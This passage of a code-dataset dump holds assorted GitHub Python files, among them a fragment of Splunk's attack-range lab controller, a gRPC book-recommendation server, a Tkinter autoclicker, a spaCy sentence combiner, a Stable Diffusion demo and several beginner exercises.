5985, 'ansible_winrm_scheme': 'http'},\n verbosity=0)\n\n if runner.status == \"successful\":\n self.log.info(\"successfully executed technique ID {0} against target: {1}\".format(simulation_techniques, target))\n else:\n self.log.error(\"failed to executed technique ID {0} against target: {1}\".format(simulation_techniques, target))\n sys.exit(1)\n\n\n def get_ip_address_from_machine(self, box):\n pattern = 'config.vm.define \"' + box + '\"[\\s\\S]*?:private_network, ip: \"([^\"]+)'\n match = re.search(pattern, self.vagrantfile)\n return match.group(1)\n\n\n def check_targets_running_vagrant(self, target, log):\n v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n status = v1.status()\n\n found_box = False\n for stat in status:\n if stat.name == target:\n found_box = True\n if not (stat.state == 'running'):\n log.error(target + ' not running.')\n sys.exit(1)\n break\n if not found_box:\n log.error(target + ' not found as vagrant box.')\n sys.exit(1)\n\n\n def list_machines(self):\n print()\n print('Vagrant Status\\n')\n v1 = vagrant.Vagrant('vagrant/', quiet_stdout=False)\n response = v1.status()\n status = []\n for stat in response:\n status.append([stat.name, stat.state, self.get_ip_address_from_machine(stat.name)])\n\n print(tabulate(status, headers=['Name','Status','IP Address']))\n print()\n\n def dump(self, dump_name):\n self.log.info(\"Dump log data\")\n\n folder = \"attack_data/\" + dump_name\n os.mkdir(os.path.join(os.path.dirname(__file__), '../' + folder))\n\n\n with open(os.path.join(os.path.dirname(__file__), '../attack_data/dumps.yml')) as dumps:\n for dump in yaml.full_load(dumps):\n if dump['enabled']:\n dump_out = dump['dump_parameters']['out']\n dump_search = \"search %s earliest=%s | sort 0 _time\" \\\n % (dump['dump_parameters']['search'], dump['dump_parameters']['time'])\n dump_info = \"Dumping Splunk Search to %s \" % dump_out\n self.log.info(dump_info)\n out = open(os.path.join(os.path.dirname(__file__), \"../attack_data/\" + dump_name + \"/\" + dump_out), 'wb')\n splunk_sdk.export_search(self.config['splunk_server_private_ip'],\n s=dump_search,\n password=self.config['splunk_admin_password'],\n out=out)\n out.close()\n self.log.info(\"%s [Completed]\" % dump_info)\n","repo_name":"splunk/attack_range_local","sub_path":"modules/VagrantController.py","file_name":"VagrantController.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"21"} +{"seq_id":"34077864670","text":"#! /usr/bin/env python\n\n'''decorator demo'''\nfrom time import time\n\noption = {\n 'pre' : 'pre_logged',\n 'post' : 'post_logged'\n}\n\ndef logged(when):\n def log(f, *args, **kargs):\n print('''Called:\n function: %s\n args: %r\n kargs: %r\n ''' % (f, args, kargs))\n\n def pre_logged(f):\n def wrapper(*args, **kargs):\n log(f, *args, **kargs)\n return f(*args, **kargs)\n return wrapper\n\n def post_logged(f):\n def wrapper(*args, **kargs):\n now = time()\n try:\n return f(*args, **kargs)\n finally:\n log(f, *args)\n print('time delta: %s' % (time()-now))\n return f(*args, **kargs)\n return wrapper\n\n try:\n choice = option[when]\n except KeyError as e:\n raise ValueError(e)\n\n if choice == 'pre_logged':\n return eval(choice)\n elif choice == 'post_logged':\n return vars()[choice]()\n # return eval(choice)\n\n\n\n@logged('post')\ndef hello(name):\n print('hello, %s' % name)\n\nhello('world!')","repo_name":"sadscv/core_programming","sub_path":"core_programming/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26262747467","text":"from types import NoneType\n\nfrom typing import List, Optional\n\nimport strawberry\nimport strawberry_django\nfrom strawberry.django import auth\n\nfrom .permissions import AdminPermission\nfrom .resolvers import (\n resolve_current_user,\n tag_anchor_mutation,\n tag_mutation,\n tutorial_anchor_mutation,\n tutorial_mutation,\n graph_anchor_mutation,\n graph_mutation,\n graph_description_mutation,\n code_mutation,\n register_mutation,\n)\nfrom .resolvers.queries import (\n resolve_tutorial_anchors,\n resolve_graph_anchors,\n get_tutorial_content,\n get_graph,\n get_graph_content,\n get_code,\n)\nfrom ..executor_runner import handle_executor_request\nfrom ..executor_runner.types import ResponseType\n\nfrom ..models import Code\nfrom ..types import (\n UserType,\n TagAnchorType,\n TutorialType,\n TutorialAnchorType,\n GraphAnchorType,\n GraphType,\n GraphDescriptionType,\n TagType,\n CodeType,\n)\n\nfrom ..types.filters import (\n TagAnchorFilter,\n)\n\n__all__ = [\"schema\"]\n\n\n@strawberry.type\nclass Query:\n me: Optional[UserType] = strawberry.field(resolver=resolve_current_user)\n tag_anchors: List[TagAnchorType] = strawberry_django.field(filters=TagAnchorFilter)\n tutorial_anchors: List[TutorialAnchorType] = strawberry_django.field(\n resolve_tutorial_anchors\n )\n graph_anchors: List[GraphAnchorType] = strawberry_django.field(\n resolve_graph_anchors\n )\n tutorial_content: Optional[TutorialType] = strawberry_django.field(\n get_tutorial_content\n )\n graph_content: Optional[GraphDescriptionType] = strawberry_django.field(\n get_graph_content\n )\n graph: Optional[GraphType] = strawberry_django.field(get_graph)\n code: Optional[Code] = strawberry_django.field(get_code)\n\n\n@strawberry.type\nclass Mutation:\n login: Optional[UserType] = auth.login()\n logout: NoneType = auth.logout()\n register: Optional[UserType] = strawberry.mutation(resolver=register_mutation)\n mutate_tag_anchor: Optional[TagAnchorType] = strawberry.mutation(\n resolver=tag_anchor_mutation\n )\n mutate_tag: Optional[TagType] = strawberry.mutation(resolver=tag_mutation)\n mutate_tutorial_anchor: Optional[TutorialAnchorType] = strawberry.mutation(\n resolver=tutorial_anchor_mutation\n )\n mutate_tutorial: Optional[TutorialType] = strawberry.mutation(\n resolver=tutorial_mutation\n )\n mutate_graph_anchor: Optional[GraphAnchorType] = strawberry.mutation(\n resolver=graph_anchor_mutation\n )\n mutate_graph: Optional[GraphType] = strawberry.mutation(resolver=graph_mutation)\n mutate_graph_description: Optional[GraphDescriptionType] = strawberry.mutation(\n resolver=graph_description_mutation\n )\n mutate_code: Optional[CodeType] = strawberry.mutation(resolver=code_mutation)\n execution_request: ResponseType = strawberry.mutation(\n resolver=handle_executor_request\n )\n\n\nschema = strawberry.Schema(query=Query, mutation=Mutation)\n","repo_name":"Reed-CompBio/GrapheryV2-Django","sub_path":"graphery/backend/schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5906449534","text":"import webapp2\nimport logging\nimport datetime\nfrom handlers.base_handler import BaseHandler\nfrom webapp2_extras import json\nfrom models.familyMember import *\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\nfrom util.memcacheHelper import safeMemcacheSet\nfrom util.template import jinja_environment\nfrom models.games import BrickBreakerTopScore\nimport json\n\nclass GamesPageHandler(BaseHandler):\n def get(self):\n template= jinja_environment.get_template('games.html')\n self.response.out.write(template.render({}))\n\nclass BrickBreakerPageHandler(BaseHandler):\n def get(self):\n template_values= get_top_5_scores()\n template= jinja_environment.get_template('brick_breaker.html')\n self.response.out.write(template.render(template_values))\n \nclass BrickBreakerHighScoresHandler(BaseHandler):\n def post(self):\n score = int(self.request.get(\"score\"))\n name = self.request.get(\"name\")\n sort_score(score,name)\n \n self.response.out.write(json.dumps(get_top_5_scores()))\n \nclass BrickBreakerInitHandler(BaseHandler):\n def get(self):\n top_score_1 = BrickBreakerTopScore(key_name=\"High_Score_DB_1\",score=0, name=\"None\")\n top_score_1.put()\n top_score_2 = BrickBreakerTopScore(key_name=\"High_Score_DB_2\",score=0, name=\"None\")\n top_score_2.put()\n top_score_3 = BrickBreakerTopScore(key_name=\"High_Score_DB_3\",score=0, name=\"None\")\n top_score_3.put()\n top_score_4 = BrickBreakerTopScore(key_name=\"High_Score_DB_4\",score=0, name=\"None\")\n top_score_4.put()\n top_score_5 = BrickBreakerTopScore(key_name=\"High_Score_DB_5\",score=0, name=\"None\")\n top_score_5.put()\n \ndef sort_score(score,name):\n score,name = swap_out_top_score_1(score,name)\n score,name = swap_out_top_score_2(score,name)\n score,name = swap_out_top_score_3(score,name)\n score,name = swap_out_top_score_4(score,name)\n score,name = swap_out_top_score_5(score,name)\n \ndef swap_out_top_score_1(score,name):\n top_score_1_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_1\")\n if (score >= top_score_1_db.score):\n temp_score = top_score_1_db.score\n temp_name = top_score_1_db.name\n top_score_1_db.score = score\n top_score_1_db.name = name\n top_score_1_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_2(score,name):\n top_score_2_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_2\")\n if (score >= top_score_2_db.score):\n temp_score = top_score_2_db.score\n temp_name = top_score_2_db.name\n top_score_2_db.score = score\n top_score_2_db.name = name\n top_score_2_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_3(score,name):\n top_score_3_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_3\")\n if (score >= top_score_3_db.score):\n temp_score = top_score_3_db.score\n temp_name = top_score_3_db.name\n top_score_3_db.score = score\n top_score_3_db.name = name\n top_score_3_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_4(score,name):\n top_score_4_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_4\")\n if (score >= top_score_4_db.score):\n temp_score = top_score_4_db.score\n temp_name = top_score_4_db.name\n top_score_4_db.score = score\n top_score_4_db.name = name\n top_score_4_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef swap_out_top_score_5(score,name):\n top_score_5_db = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_5\")\n if (score >= top_score_5_db.score):\n temp_score = top_score_5_db.score\n temp_name = top_score_5_db.name\n top_score_5_db.score = score\n top_score_5_db.name = name\n top_score_5_db.put()\n return temp_score,temp_name\n else:\n return score,name\n \ndef get_top_5_scores():\n BBDB_1 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_1\")\n BBDB_2 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_2\")\n BBDB_3 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_3\")\n BBDB_4 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_4\")\n BBDB_5 = BrickBreakerTopScore.get_by_key_name(\"High_Score_DB_5\")\n template_values = {\n \"top_score_1_DB\": {\n \"score\": BBDB_1.score,\n \"name\": BBDB_1.name\n },\n \"top_score_2_DB\": {\n \"score\": BBDB_2.score,\n \"name\": BBDB_2.name\n },\n \"top_score_3_DB\": {\n \"score\": BBDB_3.score,\n \"name\":BBDB_3.name\n },\n \"top_score_4_DB\": {\n \"score\": BBDB_4.score,\n \"name\": BBDB_4.name\n },\n \"top_score_5_DB\": {\n \"score\": BBDB_5.score,\n \"name\": BBDB_5.name\n }\n }\n return template_values;\n","repo_name":"KyleV35/KyleVermeer.com","sub_path":"handlers/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26313370490","text":"import os\n\nfrom core.graph import Graph\nfrom core.solver import Solver\nfrom core.helper import check_dir\n\n\ndef main(path, map_name, n_agents=3, random_seed=10):\n print(f\"MAPP started for {map_name}\")\n result_path = \"./routes\"\n check_dir(result_path)\n\n g = Graph()\n if not g.load_map(os.path.join(path, map_name)):\n print(f\" - load map failed: {g.error}: {map_name}.map\")\n return 1\n print(\" - load map OK\")\n\n solver = Solver(g, n_agents, map_name, \"./routes/\", random_seed=random_seed)\n if not solver.hls_pbs(verbose=1):\n print(f\"fail: {solver.error}: {map_name}.map\")\n return 1\n print(f\" - solved OK: {solver.n_decision} decision(s)\")\n\n if not solver.make_result(result_path):\n print(f\" - result store failed: {solver.error}: {map_name}.txt\")\n return 1\n\n print(f\" - result stored OK: {map_name}.txt\")\n return 0\n\n\n# main(\"./maps\", \"small\", 3, 13) # collision agent 2 vertex 2\n# main(\"./maps\", \"small\", 3, 212) # collision agent 2 vertex 9\n# main(\"./maps\", \"small\", 3, 100) # ok\n# main(\"./maps\", \"small\", 3, 10) # ok\nmain(\"./maps\", \"sample\")\n# random.seed(100, 2)\n","repo_name":"szobin/mapp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18943429620","text":"'''\n\nHackerank Domains: https://www.hackerrank.com/domains\n\nTutorials https://www.hackerrank.com/domains/tutorials/10-days-of-statistics\n\nHackerrank - 10 Days Of Statistics - Day 0: Mean, Median, and Mode\n\nObjective\nIn this challenge, we practice calculating the mean, median, and mode.\nCheck out the Tutorial tab for learning materials and an instructional video!\n\nTask\nGiven an array, , of integers, calculate and print the respective mean, median,\nand mode on separate lines. If your array contains more than one modal value,\nchoose the numerically smallest one.\n\nNote: Other than the modal value (which will always be an integer),\nyour answers should be in decimal form, rounded to a scale of decimal place\n(i.e., , format).\n\n'''\n\nfrom collections import Counter\n\nx = int(input())\nnumbers = sorted([int(i) for i in input().split()])\n\nmean = (sum(numbers) / x)\nmedian = (numbers[x // 2] + numbers[-(x // 2 + 1)]) / 2\nmode = sorted(sorted(Counter(numbers).items()), key = lambda x: x[1], reverse = True)[0][0]\n\nprint(mean, median, mode, sep = '\\n')\n","repo_name":"bryceandpeas/Website-and-Book-Solutions","sub_path":"Website Solutions/HackerRank/10 Days of Statistics/python/0_Day0_MeanMedianAndMode.py","file_name":"0_Day0_MeanMedianAndMode.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40521824059","text":"from tkinter import messagebox\nfrom tkinter import *\nimport keyboard\n\napp = Tk()\napp.config(bg=\"black\")\napp.geometry('800x500')\napp.resizable(0,0)\napp.iconbitmap('FIRECLICKERAPP/Images/logo.ico')\napp.title(\"FIRECLICKER\")\n\n\n\n\n\nfrom PIL import Image, ImageTk\n# start function\n\ndef click():\n messagebox.showinfo('Info-FIRECLICKER', 'Press Enter To Start action, After Pressing Enter Wait For 5ms and The action will start, For Now There is a standard values(You can not change the values) - If something Terrible Happens Click CTRL-Q and IF that does not work Shutdown your PC :)')\n m = k()\n def attack(): \n time.sleep(5)\n for i in range(5):\n time.sleep(0.1)\n m.click(Button.left)\n \n while True: \n if keyboard.is_pressed(\"enter\"):\n attack()\n break\n if keyboard.is_pressed(\"ctrl + q\"):\n app.destroy()\n break \n \n\n\n \n \n \n \n attack()\n\n \nstartbtn = Button(app, text=\"Start\", background=\"orange\", bd=0, font=(\"Showcard Gothic\", 13), command=click)\nstartbtn.place(x=350, y=320)\n\nfrom pynput.mouse import Button, Controller as k\nimport time\n\n\n\n\n\n\n\n# IMAGE\n\n\n\n\n\n# Create a photoimage object of the image in the path\nimage1 = Image.open(\"FIRECLICKERAPP/Images/logo.png\")\ntest = ImageTk.PhotoImage(image1)\n\nlabel1 = Label(app, image=test, bg=\"black\")\nlabel1.place(x=-10, y=1)\n\n# Text\n\nwelcome = Label(app, text=\"FIRECLICKER\", bg=\"black\", fg=\"orange\", font=(\"Fixedsys\", 50))\nwelcome.place(x=260, y=120)\n\n\n# clicker_function\n\nspeedtext = Label(app, text=\"Speed:\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nspeedtext.place(x=100, y=250)\nspeedget = Entry(app, bg=\"wheat\", width=5, font=(\"Arial\", 10))\nspeedget.place(x=160, y=253)\nspeedget.insert(0, 0.1)\nspeedunit = Label(app, text=\"ms\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nspeedunit.place(x=200, y=250)\n\nclickstext = Label(app, text=\"Clicks:\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nclickstext.place(x=300, y=250)\nclicksget = Entry(app, bg=\"wheat\", width=5, font=(\"Arial\", 10))\nclicksget.place(x=360, y=253)\nclicksget.insert(0, 5)\nclicksunit = Label(app, text=\"/speed\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nclicksunit.place(x=400, y=250)\n\nquittext = Label(app, text=\"Quit:\", bg=\"black\", fg=\"orange\", font=(\"Arial\", 12))\nquittext.place(x=500, y=250)\nquitkey = Label(app, text=\"Press CTRL-Q\", bg=\"black\", fg=\"yellow\", font=(\"Arial\", 12))\nquitkey.place(x=540, y=250)\n\n\n\n \n\n\n \n\n \n\n\n\n\n\n\n\n\n\napp.mainloop()","repo_name":"1noahark/FireClicker","sub_path":"FIRECLICKERAPP/FIRECLICKER.py","file_name":"FIRECLICKER.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39836794035","text":"# Task 3 - Sentence Combination\r\n# Programmed by - Sheane Jossel Tolentino\r\n\r\nimport tkinter as tk\r\nimport spacy\r\n\r\nnlp = spacy.load(\"en_core_web_sm\")\r\n\r\ndef combine_sentences():\r\n \"\"\"\r\n Description:\r\n Combines two sentences into a single sentence based on the relationship between their main verbs and predicates.\r\n\r\n Args:\r\n sentence1 (str): The first sentence to be combined.\r\n sentence2 (str): The second sentence to be combined.\r\n\r\n Returns:\r\n combined_sentence (str): The combined sentence.\r\n \"\"\"\r\n\r\n sentence1 = text_field1.get()\r\n sentence2 = text_field2.get()\r\n\r\n # Parse the sentences using spaCy\r\n doc1 = nlp(sentence1)\r\n doc2 = nlp(sentence2)\r\n\r\n # Find the root of each sentence (the main verb or predicate)\r\n root1 = [token for token in doc1 if token.head == token][0]\r\n root2 = [token for token in doc2 if token.head == token][0]\r\n\r\n # Combine the sentences based on the relationship between the roots\r\n if root1.dep_ == \"ROOT\" and root2.dep_ == \"ROOT\":\r\n # If both roots are main verbs, combine the sentences using a coordinating conjunction\r\n combined_sentence = f\"{sentence1} and {sentence2}\"\r\n elif root1.dep_ == \"ROOT\" and root2.dep_ != \"ROOT\":\r\n # If the first sentence has a main verb and the second does not, combine the sentences using the object of the first sentence\r\n combined_sentence = f\"{sentence1} {doc2[root2.i+1:].text}\"\r\n elif root1.dep_ != \"ROOT\" and root2.dep_ == \"ROOT\":\r\n # If the second sentence has a main verb and the first does not, combine the sentences using the subject of the second sentence\r\n combined_sentence = f\"{doc1[:root1.i].text} {sentence2}\"\r\n else:\r\n # If both sentences have non-root verbs, combine the sentences using the subject of the second sentence and the object of the first sentence\r\n combined_sentence = f\"{doc1[:root1.i].text} {doc2[root2.i+1:].text}\"\r\n \r\n # Create a label for output\r\n output_label = tk.Label(root, text=\"Sorted Sentences Based on Information Density\")\r\n output_label.pack(padx=20, pady=10)\r\n\r\n # Create the scrollbar widget\r\n scrollbar = tk.Scrollbar(root)\r\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\r\n\r\n # Create the text widget for the output\r\n output = tk.Text(root, yscrollcommand=scrollbar.set)\r\n output.pack()\r\n \r\n # Configure the scrollbar to work with the text widget\r\n scrollbar.config(command=output.yview)\r\n\r\n # Insert the sentence into the text widget\r\n output.insert(tk.END, combined_sentence)\r\n \r\n# GUI \r\nroot = tk.Tk()\r\nroot.title(\"Task 3\")\r\nroot.geometry(\"480x360\")\r\n\r\n# Create a first label and first text field\r\nlabel1 = tk.Label(root, text = \"Enter first sentence:\")\r\nlabel1.pack(padx = 20, pady = 10)\r\ntext_field1 = tk.Entry(root, width = 30)\r\ntext_field1.pack(padx = 20, pady = 10)\r\n\r\n# Create a second label and second text field\r\nlabel2 = tk.Label(root, text = \"Enter second sentence:\")\r\nlabel2.pack(padx = 20, pady = 10)\r\ntext_field2 = tk.Entry(root, width = 30)\r\ntext_field2.pack(padx = 20, pady = 10)\r\n\r\n# Create a button\r\nbutton = tk.Button(root, text = \"Submit\", command=combine_sentences)\r\nbutton.pack(padx = 20, pady = 10)\r\n\r\nroot.mainloop()","repo_name":"sheyn018/NLP-Exercises","sub_path":"Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43022125261","text":"\"\"\"\nCreate a process to call other programs\n\nVersion: 0.1\nAuthor: author\nDate: 2018-03-20\n\"\"\"\n\nimport subprocess\nimport sys\n\ndef main():\n # Get command line arguments through sys.argv\n if len(sys.argv) > 1:\n # The first command-line argument is the program itself, so start with the second\n for index in range(1, len(sys.argv)):\n try:\n # Start the subprocess through the call function of the subprocess module\n status = subprocess.call(sys.argv[index])\n except FileNotFoundError:\n print('Cannot execute %s command' % sys.argv[index])\n else:\n print('Please use command line parameters to specify the process to execute')\n\n\nif __name__ == '__main__':\n main()","repo_name":"ag143/python","sub_path":"Python-100-Days-master/Day01-15/code/Day13/multiprocess3.py","file_name":"multiprocess3.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72767338612","text":"from torch import autocast\nfrom diffusers import StableDiffusionPipeline\nfrom PIL import Image\n\nfrom shared import *\n\nmodel_id = \"CompVis/stable-diffusion-v1-4\"\n\ndef main():\n pipe = StableDiffusionPipeline.from_pretrained(\n model_id, use_auth_token=True, \n )\n pipe = pipe.to(DEVICE)\n\n num_images = 3\n # prompt = \"a photo of an astronaut riding a horse on mars\"\n prompt = \"a photo of an astronaut doing a handstand on a horse\"\n # with autocast(DEVICE_STR):\n images = pipe(\n [prompt] * num_images, \n guidance_scale=7.5, # 7 ~ 8.5\n num_inference_steps=5, \n ).images\n\n grid = image_grid(images, rows=1, cols=num_images)\n \n grid.save(prompt.replace(' ', '_') + '.png')\n\ndef image_grid(imgs, rows, cols):\n assert len(imgs) == rows*cols\n\n w, h = imgs[0].size\n grid = Image.new('RGB', size=(cols*w, rows*h))\n grid_w, grid_h = grid.size\n \n for i, img in enumerate(imgs):\n grid.paste(img, box=(i%cols*w, i//cols*h))\n return grid\n\nmain()\n","repo_name":"Daniel-Chin/Diffusion-Fusion","sub_path":"using_their_pipe/using_their_pipe.py","file_name":"using_their_pipe.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"568085353","text":"# _*_coding :utf-8 _*_\n# @Time :2022/7/13 18:30\n# @File : 英语文本词频统计\n# @Project : python_NCRE\nimport pprint\n\n\ndef getText():\n txt = open(r\"C:\\Users\\yui\\Desktop\\哈姆雷特.txt\", 'r').read()\n txt = txt.lower()\n for i in '?!@#$%^&*()''/<>.,+_=-~\\n \\t':\n txt.replace(i, ' ') # 将标点符号用空格符代替\n return txt\n\n\ntxt_ = getText()\nwords = txt_.split() # 默认情况下以空格方式切割\n# print(words)\ncounts = {} # 创建一个计数字典\n\nfor i in words: # 循环计数\n counts[i] = counts.get(i, 0) + 1\n\n# pprint.pprint(counts)\nvip_word = list(counts.items())\nvip_word.sort(key=lambda x: x[1], reverse=True) # 自定义排序规则直接操作对象,不要变量赋值\n\n# pprint.pprint(vip_word)\nfor i in vip_word:\n if vip_word.index(i) <= 50:\n print(i)\n else:\n break\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"wufake70/myPython","sub_path":"python_NCRE/实例002_英语文本词频统计.py","file_name":"实例002_英语文本词频统计.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9798255543","text":"import random\n\nfrom concurrent import futures\nfrom signal import signal, SIGTERM\n\nimport grpc\n\nimport recommendations_pb2_grpc\nfrom recommendations_pb2 import BookCategory, BookRecommendation, RecommendationResponse\n\nbooks_by_category = {\n BookCategory.MYSTERY: [\n BookRecommendation(id=1, title=\"The Maltese Falcon\"),\n BookRecommendation(id=2, title=\"Murder on the Orient Express\"),\n BookRecommendation(id=3, title=\"The Hound of the Baskervilles\"),\n ],\n BookCategory.SCIENCE_FICTION: [\n BookRecommendation(id=4, title=\"The Hitchhiker's Guide to the Galaxy\"),\n BookRecommendation(id=5, title=\"Ender's Game\"),\n BookRecommendation(id=6, title=\"The Dune Chronicles\"),\n ],\n BookCategory.SELF_HELP: [\n BookRecommendation(id=7, title=\"The 7 Habits of Highly Effective People\"),\n BookRecommendation(id=8, title=\"How to Win Friends and Influence People\"),\n BookRecommendation(id=9, title=\"Man's Search for Meaning\"),\n ],\n}\n\n\nclass RecommendationService(recommendations_pb2_grpc.RecommendationsServicer):\n def Recommend(self, request, context):\n if request.category not in books_by_category:\n context.abort(grpc.StatusCode.NOT_FOUND, \"Category not found\")\n\n books_for_category = books_by_category[request.category]\n num_results = min(request.max_results, len(books_for_category))\n books_to_recommend = random.sample(books_for_category, num_results)\n\n return RecommendationResponse(recommendations=books_to_recommend)\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n recommendations_pb2_grpc.add_RecommendationsServicer_to_server(\n RecommendationService(), server\n )\n\n with open(\"server.key\", \"rb\") as fp:\n server_key = fp.read()\n with open(\"server.pem\", \"rb\") as fp:\n server_cert = fp.read()\n\n creds = grpc.ssl_server_credentials([(server_key, server_cert)])\n server.add_secure_port(\"[::]:443\", creds)\n # server.add_insecure_port('[::]:50051')\n server.start()\n\n def handle_sigterm(*_):\n print(\"Received shutdown signal\")\n all_rpcs_done_event = server.stop(30)\n all_rpcs_done_event.wait(30)\n\n signal(SIGTERM, handle_sigterm)\n server.wait_for_termination()\n\n\nif __name__ == \"__main__\":\n serve()\n","repo_name":"tinylambda/keep","sub_path":"microservice/project_demo/recommendations/recommendations.py","file_name":"recommendations.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17301932355","text":"import sys\nsys.path.append('../../') #append the path where the drivers directory is placed\nfrom drivers.rtc.ds3231 import *\nimport time\n\nstartTime = time.time()\nrtc = RTC_DS3231('/dev/ttyUSB0', )\n\nrtc.initI2C(enablePower=True, enablePullUp=False)\n\ntime.sleep(0.05)\n\n\n# if False == rtc.setCurrTime():\n# print(\"Couldn't set current time\")\n#\n# if False == rtc.setCurrDate():\n# print(\"Couldn't set date\")\n\ntime.sleep(0.05)\n\nrcvTimeStr = rtc.readTime()\nprint(rcvTimeStr)\n\nrcvTimeDate = rtc.readDate()\nprint(rcvTimeDate)\n\nprint('Temperature is = {}°C'.format(rtc.readTemp()));\n\n\n\nrtc.deinitI2C()\n\nprint(time.time() - startTime);","repo_name":"slapab/BusPirateDrivers","sub_path":"applications/app_rtc_ds3231/app_rtc_ds3231.py","file_name":"app_rtc_ds3231.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34318923647","text":"\"\"\"Add selected view to selected sheets.\"\"\"\n\nfrom pyrevit import revit, DB\nfrom pyrevit import forms\nfrom pyrevit import script\nfrom Autodesk.Revit.DB import BuiltInParameter\n\n__author__ = 'Dan Mapes Modified by Martin Lou'\n__doc__ = 'Adds the selected views (callouts, sections, elevations) to the '\\\n 'selected sheets. Model views will only be added to the first '\\\n 'selected sheet since they can not exist on multiple sheets. ' \\\n 'The command defaults to active view if no views are selected.' \\\n '\\n\\nShift+Click:\\n' \\\n 'Pick source views from list instead of selection or active view.'\n\nlogger = script.get_logger()\n\nselected_views = []\n\n\nif __shiftclick__:\n selected_views = forms.select_views()\nelse:\n # get selection and verify a view is selected\n selection = revit.get_selection()\n if not selection.is_empty:\n logger.debug('Getting views from selection.')\n for el in selection:\n if el.Category and el.Category.Name == 'Views':\n logger.debug('Selected element referencing: {}'\n .format(el.Name))\n target_view = revit.query.get_view_by_name(el.Name)\n if target_view:\n logger.debug('Target view: {}'\n .format(revit.query.get_name(target_view)))\n selected_views.append(target_view)\n else:\n selected_view = revit.activeview\n if not isinstance(selected_view, DB.View):\n forms.alert('Active view must be placable on a sheet.', exitscript=True)\n logger.debug('Selected view: {}'.format(selected_view))\n selected_views = [selected_view]\n\n\nif selected_views:\n logger.debug('Selected views: {}'.format(len(selected_views)))\n # get the destination sheets from user\n dest_sheets = forms.select_sheets()\n all_Viewport = []\n if dest_sheets:\n logger.debug('Selected sheets: {}'.format(len(dest_sheets)))\n with revit.Transaction(\"Add Views to Sheets\"):\n if len(selected_views) != len(dest_sheets):\n print('view selection number does not match sheet selection number')\n else:\n count = 0\n for selected_view in selected_views:\n logger.debug('Adding: %s',\n revit.query.get_name(selected_view))\n try:\n viewport = DB.Viewport.Create(revit.doc,\n dest_sheets[count].Id,\n selected_view.Id,\n DB.XYZ(17, 11, 0))\n all_Viewport.append(viewport)\n except Exception as place_err:\n print('Error placing view on sheet: {} -> {}'\n .format(selected_view.Id, dest_sheets[count].Id))\n count += 1\n revit.get_selection().set_to(all_Viewport)\nelse:\n forms.alert('No views selected.')\n","repo_name":"tkahng/nerv_pyrevit","sub_path":"CustomExtension.extension/Nerv.tab/Items.panel/Views.pulldown/Add Views to Sheets.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"34423927618","text":"#!/usr/bin/python3\n# 《Python语言程序设计》程序清单3-4\n# Programed List 3-4\n# Asking for change and Coins at least\n\n# Receive the amount\namount = eval(input(\"Enter an amount, for example, 11.56: \"))\n\n# Convert the amount to cents\nremainingAmount = int(amount * 100)\n\n# Find the number of one dollars\nnumberOfOneDollars = remainingAmount // 100\nremainingAmount = remainingAmount % 100\n\n# Find the number of quarters in the remaining amount\nnumberOfQuarters = remainingAmount // 